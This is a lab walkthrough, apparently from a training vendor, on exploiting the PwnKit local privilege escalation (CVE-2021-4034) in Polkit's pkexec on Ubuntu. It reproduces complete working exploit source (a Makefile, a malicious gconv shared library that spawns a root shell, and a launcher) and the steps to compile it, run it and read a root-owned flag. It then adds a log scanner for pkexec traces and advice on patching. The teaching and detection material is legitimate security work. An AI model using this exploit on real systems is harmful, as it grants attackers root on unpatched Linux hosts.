Lab Walkthrough - Exploiting PwnKit (CVE-2021-4034)
In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
Introduction
The Qualys team discovered a Local Privilege Escalation (from any user to root) in Polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution.
PwnKit is a memory corruption vulnerability in the pkexec command (installed on all major Linux distributions), assigned CVE-2021-4034 and announced on January 25, 2022. The flaw dates back to the original release of pkexec in 2009. It received a CVSS score of 7.8 ("High severity"), reflecting the serious consequences of a possible exploit: unprivileged users can gain full root privileges, regardless of the underlying machine architecture and regardless of whether the polkit daemon is running.
References
In this lab writeup, we will learn how to exploit the local privilege escalation vulnerability in the pkexec utility in a realistic environment to gain root access on the machine. It is best to follow along with the writeup in the lab itself, which gives you hands-on experience with PwnKit.
Lab Environment
In this lab environment, the user is going to get access to an Ubuntu CLI instance. The provided Ubuntu instance has a vulnerable version of the Polkit’s pkexec utility.
Objective: Exploit the local privilege escalation vulnerability in the Polkit’s pkexec utility to gain root access and retrieve the flag!
Acknowledgements
The setup code is based on the following GitHub repository:
Tools
The best tools for this lab are:
- make
- A web browser
Solution
Vulnerability Identification
Step 1: Open the lab link to access the Ubuntu CLI instance.
Step 2: Check the system information.
Commands:
uname -a
cat /etc/issue
We have an Ubuntu 20.04 instance running the 5.4.0-107-generic kernel.
Step 3: Check all available SUID binaries.
Run the following command to find all SUID binaries:
Command:
find / -perm -4000 2>/dev/null
/usr/bin/pkexec is a SUID binary.
Information:
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones. Polkit allows a level of control of centralized system policy.
Reference: https://en.wikipedia.org/wiki/Polkit
The pkexec utility is part of Polkit. It is used to execute commands as another user, similar to sudo:
Reference: https://linux.die.net/man/1/pkexec
Check the permissions of the pkexec binary:
Command:
ls -al /usr/bin/pkexec
pkexec is a SUID root binary.
Step 4: Check the pkexec utility version.
Commands:
/usr/bin/pkexec
/usr/bin/pkexec --version
pkexec version 0.105 is installed on the system.
Step 5: Identify the vulnerabilities in the installed version of the pkexec utility.
Search the web for the following string:
Search string:
pkexec version 0.105
The search results refer to a local privilege escalation (LPE) vulnerability in the detected version of polkit.
The CVE corresponding to the listed issue is CVE-2021-4034.
Exploitation
Step 6: Open the packetstormsecurity link.
URL: https://packetstormsecurity.com/files/165739/PolicyKit-1-0.105-31-Privilege-Escalation.html
Notice the exploit code is present on this page.
Step 7: Save the exploit code to individual files.
Save the code for the Makefile, evil-so.c, and exploit.c into files with those names:
Makefile:
all:
	gcc -shared -o evil.so -fPIC evil-so.c
	gcc exploit.c -o exploit

clean:
	rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so
evil-so.c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <grp.h>

/* iconv expects a gconv() symbol in every conversion module; an empty body is enough. */
void gconv() {}

/* Runs when glibc's iconv loads this module. pkexec is SUID root, so the
   process already has root privileges at that point. */
void gconv_init() {
    setuid(0);
    setgid(0);
    setgroups(0, NULL);
    execve("/bin/sh", NULL, NULL);
}
exploit.c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BIN "/usr/bin/pkexec"
#define DIR "evildir"
#define EVILSO "evil"

int main()
{
    /* pkexec is started with an empty argv (argc == 0), the root cause of
       CVE-2021-4034: it then reads envp[0] where argv[1] should be, so the
       environment below is what pkexec processes as its "command". */
    char *envp[] = {
        DIR,
        "PATH=GCONV_PATH=.",
        "SHELL=ryaagard",
        "CHARSET=ryaagard",
        NULL
    };
    char *argv[] = { NULL };

    /* Stage the fake gconv module directory referenced through GCONV_PATH. */
    system("mkdir GCONV_PATH=.");
    system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR);
    system("mkdir " DIR);
    system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules");
    system("cp " EVILSO ".so " DIR);

    execve(BIN, argv, envp);
    return 0;
}
Once these files are saved, you should have three files in your home directory:
Command:
ls -l
Step 8: Compile the exploit code.
Commands:
make all
ls
Two files, namely evil.so and exploit, are generated.
Step 9: Run the generated exploit binary.
Check the id before and after running the exploit binary:
Commands:
id
./exploit
id
We have obtained a root shell after running the exploit binary.
Step 10: Retrieve the flag.
Find the flag file:
Command:
find / -iname "*flag*" 2>/dev/null
The flag file is located in the file /root/FLAG.
Read the flag:
Command:
cat /root/FLAG
FLAG: 8c878e95370447b7abc54b2a108d9952
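The environment the exploit above hands to pkexec includes SHELL=ryaagard, a value that is not listed in /etc/shells, so pkexec writes a rejection message through syslog before the injected gconv module runs; the Qualys advisory linked in the conclusion quotes that message and the "contains suspicious content" variant as the traces this technique leaves in the logs. The following scanner is an added example, not code from the page or the lab: it runs over constructed auth.log-style lines (hostname, PIDs and timestamps are made up) and reports which lines carry either indicator.

```python
import re
from typing import Iterable, List, Tuple

# The two messages pkexec writes via syslog (auth facility) when it rejects an
# environment variable, both quoted in the Qualys advisory as traces of this
# technique. The strings in the pkexec sources are slightly irregular ("not
# found the", "suscipious"), so the patterns accept both the literal and the
# corrected spelling.
INDICATORS = {
    "shell_not_in_etc_shells": re.compile(
        r"The value for the SHELL variable was not found (in )?the /etc/shells file"
    ),
    "env_var_suspicious_content": re.compile(
        r"The value for environment variable \S+ contains \S+ content"
    ),
}
# Only lines emitted by the pkexec process itself count; syslog tags them "pkexec[PID]:".
PKEXEC_TAG = re.compile(r"\bpkexec\[\d+\]:")


def find_pwnkit_traces(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, indicator_name, line) for every pkexec syslog line
    that carries one of the indicators. Feed it auth.log or journalctl output."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if not PKEXEC_TAG.search(line):
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((number, name, line.rstrip("\n")))
                break
    return hits


# Constructed sample in Ubuntu auth.log layout (hostname, PIDs and timestamps are
# made up). Line 2 is the message the exploit on this page provokes by passing
# SHELL=ryaagard, a value that is not listed in /etc/shells.
SAMPLE_AUTH_LOG = """\
Jan 25 10:41:02 lab sshd[812]: Accepted password for student from 10.0.0.5 port 51022 ssh2
Jan 25 10:41:09 lab pkexec[1403]: student: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/home/student]
Jan 25 10:42:15 lab pkexec[1460]: student: The value for environment variable CHARSET contains suscipious content [USER=root] [TTY=/dev/pts/0] [CWD=/home/student]
Jan 25 10:43:00 lab sudo:  student : TTY=pts/0 ; PWD=/home/student ; USER=root ; COMMAND=/usr/bin/apt update
"""

if __name__ == "__main__":
    for number, name, line in find_pwnkit_traces(SAMPLE_AUTH_LOG.splitlines()):
        print(f"line {number}: {name}")
```

The same advisory notes that the vulnerability can also be exploited without leaving these traces, so an empty result is not evidence that a host was never attacked; patching, and in the meantime removing the SUID bit from pkexec, remain the controls.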
Potential Impact of PwnKit Vulnerability
Successful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host. Qualys security researchers have been able to independently verify the vulnerability, develop an exploit, and obtain full root privileges on default installations of Ubuntu, Debian, Fedora, and CentOS. Other Linux distributions are likely vulnerable and probably exploitable. This vulnerability has been hiding in plain sight for 12+ years and has affected all versions of pkexec since its first version in May 2009 (commit c8c3d83, "Add a pkexec(1) command").
How to patch the PwnKit vulnerability
Given the breadth of the attack surface for this vulnerability across both Linux and non-Linux OS, Qualys recommends that users apply patches for this vulnerability immediately.
Conclusion
With that, we conclude this lab writeup on PwnKit. The notable point is the ease of exploitation of this memory corruption vulnerability: despite being a memory corruption issue, pkexec is instantly and reliably exploitable in an architecture-independent manner.
If you wish to dig down and find out more about the vulnerability and how the exploitation is done, it is worth checking the advisory published by the Qualys team: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
References
Want to try this lab hands-on? Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!